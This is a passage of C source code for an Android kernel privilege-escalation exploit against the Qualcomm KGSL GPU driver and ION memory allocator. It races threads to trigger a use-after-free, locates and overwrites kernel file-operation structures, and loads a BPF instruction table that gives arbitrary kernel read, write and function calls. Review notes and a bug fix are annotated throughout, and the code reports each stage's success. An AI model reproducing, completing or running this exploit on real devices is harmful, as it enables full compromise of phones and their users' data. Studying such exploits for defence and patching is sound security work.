      if ((candidate >> 48) == 0xffff) {
        return curr - data;
      }
    }
    curr += 16;
    left -= 16;
  }
  return -1;
}

/*
 * Look through mapped regions 2..BOUNCE_LEN-1 for the /dev/null file pattern.
 *
 * On the first hit the globals ion_addr and bpf_addr are computed (bpf_addr is
 * the found word minus NULL_TO_BPF), the structure is patched through
 * overwrite_fops() and overwrite_fmode(), and the region index is returned.
 *
 * Returns the region index of the hit, or -1 if no region matched.
 */
int find_null_fops() {
  unsigned long null_fops;
  int idx;

  for (idx = 2; idx < BOUNCE_LEN; idx++) {
    long hit;

    /* Skip slots that were never mapped. */
    if (ion_sys_regions[idx] == 0) {
      continue;
    }
    hit = search_null_fops(&(ion_sys_regions[idx][0]), SYS_LEN, &null_fops);
    if (hit == -1) {
      continue;
    }

    printf("[+] Found null_fops at %d region offset %ld %lx\n", idx, hit, null_fops);
    ion_addr = calculate_ion_addr(hit, idx);
    bpf_addr = null_fops - NULL_TO_BPF;
    printf("[+] ion region location: %lx\n", ion_addr);
    printf("[+] bpf addr: %lx\n", bpf_addr);
    overwrite_fops(idx, hit, ion_addr);
    overwrite_fmode(idx, hit);
    return idx;
  }

  printf("[-] Failed to find null_fops\n");
  return -1;
}

/*
 * Look through mapped regions 2..BOUNCE_LEN-1 for the dma-buf file pattern.
 *
 * On the first hit the globals ion_addr and bpf_addr are computed (bpf_addr is
 * the found word minus DMA_TO_BPF), the structure is patched through
 * overwrite_fops() and overwrite_fmode(), and the region index is returned.
 *
 * Returns the region index of the hit, or -1 if no region matched.
 */
int find_dma_fops() {
  unsigned long dma_fops;
  int idx;

  for (idx = 2; idx < BOUNCE_LEN; idx++) {
    long hit;

    /* Skip slots that were never mapped. */
    if (ion_sys_regions[idx] == 0) {
      continue;
    }
    hit = search_dma_fops(&(ion_sys_regions[idx][0]), SYS_LEN, &dma_fops);
    if (hit == -1) {
      continue;
    }

    printf("[+] Found dma_buf_fops at %d region offset %ld %lx\n", idx, hit, dma_fops);
    ion_addr = calculate_ion_addr(hit, idx);
    bpf_addr = dma_fops - DMA_TO_BPF;
    printf("[+] ion region location: %lx\n", ion_addr);
    printf("[+] bpf addr: %lx\n", bpf_addr);
    overwrite_fops(idx, hit, ion_addr);
    overwrite_fmode(idx, hit);
    return idx;
  }

  printf("[-] Failed to find dma_buf_fops\n");
  return -1;
}

void dump_memory(int i) {
  char name[64];
  snprintf(name, sizeof(name), "/data/local/tmp/mem_dump/mem_dump%u.bin", i);

  FILE* fptr = fopen(name, "wb");
  if (fptr == NULL) {
    err(1, "error open dump file\n");
  }

  for (int i = 2; i < 64; i++) {
    if (ion_sys_regions[i] != 0) {
      fwrite(&(ion_sys_regions[i][0]), SYS_LEN, 1, fptr);
    }
  }

  fclose(fptr);
}

//----------------------------------------------exploit part-----------------------------------------

/*
 * Run one complete attempt: start all helper threads, release them in a fixed
 * order, then collect the outcome.
 *
 * dma_address:   forwarded to init_reallocation().
 * length:        forwarded to init_reallocation().
 * regions:       MMAP_LEN user addresses; the first MMAP_LEN - 1 are imported
 *                by prepare_gpu_import(), the last is used for the second
 *                import unless DMA_SPRAY is defined.
 * ion_region:    user address used for the first import request (`par`).
 * ion_alloc_fds: [0] is handed to trigger_uaf(), [1] to ion_map(); [2] is only
 *                read when DMA_SPRAY is defined.
 * read:          forwarded to trigger_uaf() to select its sync flags.
 *
 * The outcome is reported on stdout by comparing the global trigger_time with
 * TRIGGER_THRESH. All cross-thread flags are cleared before returning.
 *
 * NOTE(review): none of the threads created here are joined, and the sockets
 * in `rta` are never closed, so every call leaves descriptors open.
 * NOTE(review): statement order is significant throughout; this block is
 * annotated only, not restructured.
 */
void do_one_rw(uint64_t dma_address, size_t length, uint64_t* regions, char* ion_region, int* ion_alloc_fds, unsigned int read) {
  struct realloc_thread_arg rta[NB_REALLOC_THREADS];
  memset(rta, 0, sizeof(rta));
  if (init_reallocation(rta, NB_REALLOC_THREADS, dma_address, length)) {
    err(1, "[-] failed to initialize reallocation!\n");
  }

  int kgsl_fd;

  kgsl_fd = open("/dev/kgsl-3d0", 0);
  if (kgsl_fd == -1) {
    err(1, "cannot open kgsl\n");
  }
  
  prepare_gpu_import(kgsl_fd, regions);

  // First import request, issued directly from this thread further down.
  struct kgsl_gpuobj_import par;
  struct kgsl_gpuobj_import_useraddr useraddr = {.virtaddr = (uint64_t)ion_region};
  par.flags = 0x1F0000;
  par.type = KGSL_USER_MEM_TYPE_ADDR;
  par.priv_len = 0x1000;
  par.priv = (uint64_t)(&useraddr);
  par.id = 0;
  
  pthread_t trigger_tid;
  struct trigger_uaf_arg arg = {.fd = ion_alloc_fds[0], .read = read};

  if (pthread_create(&trigger_tid, NULL, trigger_uaf, &arg) != 0) {
      err(1, "[-] pthread_create trigger");
  }
  int pipe_write[PIPE];
  for (int i = 0; i < PIPE; i++) {
    // NOTE(review): pipe() is unchecked, and &pipe_fd[0] is handed to a thread
    // although pipe_fd goes out of scope at the end of this iteration.
    int pipe_fd[2];
    pipe(pipe_fd);
  
    pthread_t rw_tid;
    if (pthread_create(&rw_tid, NULL, read_pipe, &(pipe_fd[0])) != 0) {
      err(1, "[-] pthread_create read");
    }
    pipe_write[i] = pipe_fd[1];
    struct sched_param sched_par = {0};

    if (pthread_setschedparam(rw_tid, SCHED_NORMAL, &sched_par) != 0) {
      err(1, "[-] set priority for rw failed\n");
    }
  }

  // Second import request, executed by the gpu_import thread. The kgsl
  // descriptor is passed to that thread in the id field.
  struct kgsl_gpuobj_import par2;
  par2.flags = 0x1000;
  par2.priv_len = 0x1000;
  par2.id = kgsl_fd;
#ifdef DMA_SPRAY
  struct kgsl_gpuobj_import_dma_buf buf = {.fd = ion_alloc_fds[2]};
  par2.type = KGSL_USER_MEM_TYPE_DMABUF;
  par2.priv = (uint64_t)(&buf);
#else
  struct kgsl_gpuobj_import_useraddr useraddr2 = {.virtaddr = regions[MMAP_LEN - 1]};
  par2.type = KGSL_USER_MEM_TYPE_ADDR;
  par2.priv = (uint64_t)(&useraddr2);
#endif

  struct sched_param sched_par = {0};

  // The trigger thread is given the SCHED_IDLE policy.
  if (pthread_setschedparam(trigger_tid, SCHED_IDLE, &sched_par) != 0) {
    err(1, "[-] set priority for trigger failed\n");
  }


  char write_char;
  write_char = 'a';

  migrate_to_cpu(CPU0);

  pthread_t import_tid;
  if (pthread_create(&import_tid, NULL, gpu_import, &par2) != 0) {
      err(1, "[-] pthread gpu_import");
  }
#ifdef SPRAY_1
  pthread_t ion_map_tid;
  if (pthread_create(&ion_map_tid, NULL, ion_map, &(ion_alloc_fds[1])) != 0) {
      err(1, "[-] pthread_create ion_map");
  }
#endif
  sleep(1);
#ifndef SPRAY_1
  ion_map(&(ion_alloc_fds[1]));
#endif

  // First import; its return value is not checked.
  ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &par);
#ifdef SPRAY_1
  // Release ion_map(), wait for its last mapping, then unmap everything it mapped.
  // NOTE(review): the slots of g_ion_regions are not volatile-qualified (only
  // the pointed-to chars are), so this polling loop relies on the compiler
  // re-reading the slot.
  g_map_now = 1;
  sched_yield();
  sleep(1);
  while (!g_ion_regions[G_REGION_LEN - 1]);
  for (int i = 0; i < G_REGION_LEN; i++) {
    munmap((void*)(g_ion_regions[i]), 0x1000);
  }
#endif
  // Release gpu_import().
  g_import_now = 1;
  sched_yield();
  sleep(1);

  // Id of the object created by the second import (read back from par2).
  struct kgsl_gpumem_free_id id = {.id = par2.id};
  
  // Release trigger_uaf(), then unblock the pipe reader(s).
  g_trigger_now = 1;
  for (int i = 0; i < PIPE; i++) {
    write(pipe_write[i], &write_char, 1);
  }
  while (!g_unlocked_read);
  ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_FREE_ID, &id);
  g_realloc_now = 1;
  sched_yield(); // don't run me, run the reallocator threads!
  sleep(5);
  g_finished_read = 1;

  close(kgsl_fd);
  // NOTE(review): `mhdr` is passed to recvmsg() without being initialised, and
  // `size` is unsigned, so the `< 0` test below can never be true; a -1 return
  // becomes a large positive value and simply ends the inner loop.
  struct msghdr mhdr;
  unsigned int size = 0;
  for (int i = 0; i < NB_REALLOC_THREADS; i++) {
	  while (size == 0) {
		if ((size = recvmsg(rta[i].recv_fd, &mhdr, MSG_DONTWAIT)) < 0) {
		  err(1, "receive");
		}
	  }
      size = 0;
  }
  if (trigger_time < TRIGGER_THRESH) {
    printf("[-] Failed to win the race\n");
  } else {
    printf("[+] Read/Write operation succeeded\n");
  }
  for (int i = 0; i < PIPE; i++) {
    close(pipe_write[i]);
  }
  reset_globals();
}

/*
 * Size in bytes of the first mapping created by init_tmp_region():
 * (1 << ORDER) minus VMAS_LEN + 2 pages of 0x1000 bytes.
 */
size_t compute_ion_region_size() {
  const int reserved_pages = VMAS_LEN + 2;

  return (1 << ORDER) - 0x1000 * reserved_pages;
}

/*
 * Allocate one ION buffer of (1 << ORDER) bytes and map it in VMAS_LEN + 2
 * pieces.
 *
 * ion_fd:          open /dev/ion descriptor.
 * tmp_ion_regions: array of at least VMAS_LEN + 1 slots. Slot 0 receives a
 *                  shared mapping of compute_ion_region_size() bytes at file
 *                  offset 0x1000; slots 1..VMAS_LEN receive private
 *                  single-page mappings of the last VMAS_LEN pages.
 * ion_region:      receives a private single-page mapping at file offset 0x2000.
 *
 * Returns the descriptor of the new buffer. Any allocation or mmap failure
 * terminates the process through err().
 *
 * Fix: the failure check for the ion_region mapping compared the out-parameter
 * itself with MAP_FAILED instead of the mapping it points to, so a failed
 * mmap() went unnoticed.
 */
int init_tmp_region(int ion_fd, char** tmp_ion_regions, char** ion_region) {
  int ion_alloc_fd = -1;

  struct ion_allocation_data ion_alloc_data;
  ion_alloc_data.len = 1 << ORDER;
  ion_alloc_data.flags = 1;
  ion_alloc_data.heap_id_mask = ION_HEAP(25);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
    err(1, "ION_IOC_ALLOC 1 failed\n");
  }
  
  ion_alloc_fd = ion_alloc_data.fd;
  if (ion_alloc_data.len < 0x1000 * (VMAS_LEN + 2)) {
    err(1, "VMAS_LEN too large\n");
  }

  size_t ion_region_size0 = compute_ion_region_size();

  tmp_ion_regions[0] = mmap(NULL, ion_region_size0, PROT_READ | PROT_WRITE, MAP_SHARED, ion_alloc_data.fd, 0x1000);
  if (tmp_ion_regions[0] == MAP_FAILED) {
    err(1, "map failed tmp region 0");
  }

  *ion_region = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, ion_alloc_data.fd, 0x2000);
  if (*ion_region == MAP_FAILED) {
    err(1, "map failed");
  }

  /* One private page per slot, covering the tail of the buffer. */
  for (int i = 0; i < VMAS_LEN; i++) {
    tmp_ion_regions[i + 1] = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, ion_alloc_data.fd, ion_alloc_data.len -  0x1000 * (VMAS_LEN - i));
    if (tmp_ion_regions[i + 1] == MAP_FAILED) {
      err(1, "map tmp failed %d", i);
    }
  }
  return ion_alloc_fd;
}

/*
 * Program entry point.
 *
 * Sets up the bounce buffers, MMAP_LEN anonymous pages and the ION buffers,
 * then makes up to five attempts. Each attempt maps a fresh large ION buffer
 * (init_tmp_region), runs do_one_rw(), and syncs the bounce buffers. If
 * trigger_time exceeded TRIGGER_THRESH, the bounce regions are searched with
 * find_null_fops() / find_dma_fops(); on a hit the instruction table below is
 * copied into bounce region 1 and further do_one_rw() rounds are run until the
 * expected value (12345) appears at the program's output offset.
 *
 * NOTE(review): ion_alloc_fds[2] is only assigned when DMA_SPRAY is defined,
 * yet all three entries are closed at the end.
 * NOTE(review): ion_alloc_fds[0] is overwritten on every attempt without the
 * previous descriptor being closed.
 * NOTE(review): the success `break` leaves the attempt loop before the munmap
 * cleanup at the bottom of the loop body runs.
 * NOTE(review): inner loops reuse the name `i`, shadowing the attempt counter.
 */
int main() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  int ion_alloc_fds[3];

  struct bounce_buffer_param p;
  allocate_bounce_buffer(&p);

  // MMAP_LEN anonymous single pages, later handed to kgsl by do_one_rw().
  uint64_t regions[MMAP_LEN];
  for (int i = 0; i < MMAP_LEN; i++) {
    regions[i] = (uint64_t)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    if ((void*)(regions[i]) == MAP_FAILED) {
      err(1, "mmap %d failed", i);
    }
  }
  
  char* ion_region;
  char* tmp_ion_regions[VMAS_LEN + 1];

  int ion_fd = open("/dev/ion", O_RDONLY);
  if (ion_fd == -1) {
    err(1, "cannot open ion\n");
  }

  // Buffer of G_REGION_LEN pages that ion_map() maps during each attempt.
  struct ion_allocation_data ion_alloc_data2;
  ion_alloc_data2.len = 0x1000 * G_REGION_LEN;
  ion_alloc_data2.flags = 1;
  ion_alloc_data2.heap_id_mask = ION_HEAP(19);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data2) < 0) {
    err(1, "ION_IOC_ALLOC 2 failed\n");
  }

  ion_alloc_fds[1] = ion_alloc_data2.fd;
#ifdef DMA_SPRAY
  struct ion_allocation_data ion_alloc_data3;
  ion_alloc_data3.len = 0x1000 * NENTS;
  ion_alloc_data3.flags = 1;
  ion_alloc_data3.heap_id_mask = ION_HEAP(25);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data3) < 0) {
    err(1, "ION_IOC_ALLOC failed bounce 1\n");
  }
  ion_alloc_fds[2] = ion_alloc_data3.fd;
#endif
  size_t ion_region_size0 = compute_ion_region_size();
  // Up to five attempts.
  for (int i = 0; i < 5; i++) {
    ion_alloc_fds[0] = init_tmp_region(ion_fd, &(tmp_ion_regions[0]), &ion_region);
    do_one_rw(DMA_ADDRESS, SYS_LEN * BOUNCE_LEN, regions, ion_region, &(ion_alloc_fds[0]), 0);
    sleep(1);
    sync_bounce_buffers(0);
    
    printf("done read %d\n", i);
    if (trigger_time > TRIGGER_THRESH) {
#ifdef DEBUG_MEM_DUMP
      dump_memory(i);
#endif     
      // Search for both patterns; if both are found, the lower region index wins.
      int null_region_index = find_null_fops();
      int dma_region_index = find_dma_fops();
      int region_index = -1;
      // `type` is only read when region_index != -1, in which case it was set below.
      enum region_type type;
      if (null_region_index != -1 && dma_region_index != -1) {
        if (null_region_index < dma_region_index) {
          region_index = null_region_index;
          type = null;
        } else {
          region_index = dma_region_index;
          type = dma;
        }
        
      } else if (null_region_index != -1) {
          region_index = null_region_index;
          type = null;
      } else if (dma_region_index != -1) {
          region_index = dma_region_index;
          type = dma;
      }

      if (region_index != -1) {
        if (region_index < 2) {
          err(1, "region index calculation error\n");
        }
        // Fill the first ten words of bounce region 1 with bpf_addr.
        unsigned long* fops = (unsigned long*)(&(ion_sys_regions[1][0]));
        for (int i = 0; i < 10; i++) {
          fops[i] = bpf_addr;
        }
        sync_bounce_buffers(1);
        // Data area: 2048 bytes into bounce region 1 (user view and computed address).
        unsigned long bpf_data_address = ion_addr + 2048;
        unsigned long __bpf_call_base = bpf_addr - BPF_TO_BASE;
        unsigned long* bpf_data = (unsigned long*)(&(ion_sys_regions[1][2048]));
        trigger_time = 0;
//-------BPF program, from https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html -------------------------------------------------------
        //bpf program to run
		struct bpf_insn insn[] = {
			// Load base address.
			/*  0 */ BPF_LD_IMM64(BPF_REG_6, bpf_data_address),

			// Load R7 = (in:data + 0); this is the operation to perform.
			/*  2 */ BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, bpf_op_offset),

			// Check if this operation is 'r'.
			/*  3 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'r', +4),
			// Load R1 = *(in:data + 8); this is the read address.
			/*  4 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_rw_addr_offset),
			// Load R1 = *R1.
			/*  5 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_1, 0),
			// Store *(out:data + 8) = R1.
			/*  6 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, bpf_out_offset),
			// Done.
			/*  7 */ BPF_JMP_A(13),

			// Check if this operation is 'w'.
			/*  8 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'w', +4),
			// Load R1 = *(in:data + 8); this is the write address.
			/*  9 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_rw_addr_offset),
			// Load R2 = *(in:data + 10); this is the value to write.
			/* 10 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, bpf_arg0),
			// Store *R1 = R2.
			/* 11 */ BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),
			// Done.
			/* 12 */ BPF_JMP_A(8),

			// Check if this operation is 'x'.
			/* 13 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'x', +7),
			// Load R1 = *(in:data + 10); this is the first argument.
			/* 14 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_arg0),
			// Load R2 = *(in:data + 18); this is the second argument.
			/* 15 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, bpf_arg1),
			// Load R3 = *(in:data + 20); this is the third argument.
			/* 16 */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_6, bpf_arg2),
			// Load R4 = *(in:data + 28); this is the fourth argument.
			/* 17 */ BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_6, bpf_arg3),
			// Load R5 = *(in:data + 30); this is the fifth argument.
			/* 18 */ BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_6, bpf_arg4),
			// Call R0 = function(R1, R2, R3, R4, R5). This call gets patched.
			/* 19 */ BPF_EMIT_CALL(__bpf_call_base - 4),
			// Store *(out:data + 8) = R0.
			/* 20 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0x108),
			// Done. Fallthrough.

			// Store *(out:data + 0) = R7, i.e., record the operation that we just executed.
			/* 21 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_7, 0x100),
		};
//------------------------------------------------------------------------------------------------------------------
        // Repeat rounds until the expected marker value is read back.
        while (1) {
          ion_alloc_fds[0] = init_tmp_region(ion_fd, &(tmp_ion_regions[0]), &ion_region);
		  do_one_rw(DMA_ADDRESS, SYS_LEN * (region_index + 1), regions, ion_region, &(ion_alloc_fds[0]), 1);
       printf("running bpf program\n");
        
        // Instruction table lives 1024 bytes into bounce region 1.
        unsigned long bpf_insn_addr = ion_addr + 1024;
        memcpy(&(ion_sys_regions[1][1024]), insn, sizeof(insn));
        // Marker value at word 128 of the data area (byte offset 1024).
        bpf_data[128] = 12345;
        //set up read
		bpf_data[bpf_op_offset/8] = 'r';
        bpf_data[bpf_rw_addr_offset/8] = bpf_data_address + 1024;
        // Call lseek64 on every descriptor of the kind that was found.
        switch(type) {
          case null:
            for (int i = 0; i < SLAB_LEN; i++) {
              lseek64(p.null_fds[i], bpf_insn_addr, 0);
            }
            break;
          case dma:
            for (int i = 0; i < REGIONS_LEN_1; i++) {
              lseek64(ion_sys_fds[i], bpf_insn_addr, 0);
            }
            for (int i = 0; i < REGIONS_LEN_2; i++) {
              lseek64(ion_sys_fds2[i], bpf_insn_addr, 0);
            }
            break;
          default:
            break;
        }
        printf("bpf_data 0x%lx\n", bpf_data[bpf_out_offset/8]);
        if (bpf_data[bpf_out_offset/8] == 12345) {
          printf("[+] successful read\n");
          break;
        }
      }
      // Leaves the attempt loop; the per-attempt cleanup below is skipped.
      break;
      }
    }
    // Per-attempt cleanup of the mappings made by init_tmp_region().
    munmap(tmp_ion_regions[0], ion_region_size0);
    munmap(ion_region, 0x1000);
    for (int i = 0; i < VMAS_LEN; i++) {
      munmap(tmp_ion_regions[i + 1], 0x1000);
    }
    sleep(5);
  }

  for (int i = 0; i < 3; i++) {
    close(ion_alloc_fds[i]);
  }

  close(ion_fd);
  
  for (int i = 0; i < BOUNCE_LEN; i++) {
    munmap(bounce_regions[i], SYS_LEN);
  }
}
